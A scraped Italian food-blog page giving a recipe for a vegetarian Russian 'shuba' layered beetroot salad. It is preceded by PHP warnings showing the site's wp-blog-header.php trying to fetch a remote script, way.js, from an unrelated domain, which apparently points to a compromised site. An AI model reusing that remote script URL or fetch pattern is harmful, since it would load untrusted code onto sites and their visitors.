Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17

Warning: file_get_contents(http://get.lightsteper.com/scripts/way.js): failed to open stream: php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
Insalata Shuba - YouMum

insalata shuba

Riproduci video

L’insalata shuba è un tipico antipasto russo a base di verdure bollite e barbabietola rossa.

In Russia viene arricchita anche con uova e aringhe affumicate, ma oggi noi ne prepariamo una versione light e vegetariana, senza però farci mancare il piacere di un altro ingrediente principe di questa ricetta: la maionese. Come sapete ora la si trova facilmente anche in versione veg ed è quella che utilizzerò, tanto il gusto è molto simile.

Questo spettacolo per gli occhi, si può assemblare sia in un bicchierino trasparente, sia in un coppapasta, l’importante è che diate risalto al suo aspetto scenografico.

In Russia è un piatto tipico anche dei giorni di festa (proprio perché super ricco) ma, come vi dicevo, senza proteine animali, diventa un antipasto all season, da godere in qualsiasi pranzo, aperitivo o cena, meglio se in compagnia.

Ma basta chiacchiere, ecco la ricetta:

 

Ingredienti

Dosi x 4 porzioni

  • 4 carote lesse
  • 3 patate lesse
  • 2 barbabietole già cotte
  • 1 tubetto di maionese (veg)
  • 2 cipollotti (anche parte verde)
  • Erba cipollina (facoltativo)

 

Procediemento
  1. Grattugiate o sminuzzate prima le carote, poi le patate e infine la barbabietola. Devono risultare quasi impalpabili, dividetele in ciotole diverse.
  2. Tagliate ora i cipollotti fini fini.
  3. Nella ciotola della barbabietola aggiungete la maionese e amalgamate fino a creare un unico composto color fucsia sgargiante.
  4. Ora è già il momento di assemblare: potete decidere voi l’ordine degli ingredienti, l’importante è che nell’ultimo strato ci sia sempre la crema di barbabietola (la nostra “Shuba”, che in russo significa pelliccia) proprio perché va a coprire tutti gli strati sottostanti. Vi consiglio di iniziare dalle patate, comprimetele bene livellandole in modo omogeneo fino ad un quarto dell’altezza del bicchierino o del coppapasta a seconda di cosa deciderete di utilizzare. Procedete poi con il cipollotto, seguite con le carote ed infine coprite abbondantemente con la shuba.
  5. Guarnite a piacere con qualche ingrediente che faccia contrasto cromatico con il rosa della vostra insalata: io ho usato l’erba cipollina fresca con il suo verde sgargiante.

 

Enjoy,

Baci Verdi

Vuoi sorprendere la tua famiglia con ricette nuove, semplici e alternative?

Clicca qui per guardare tutte le ricette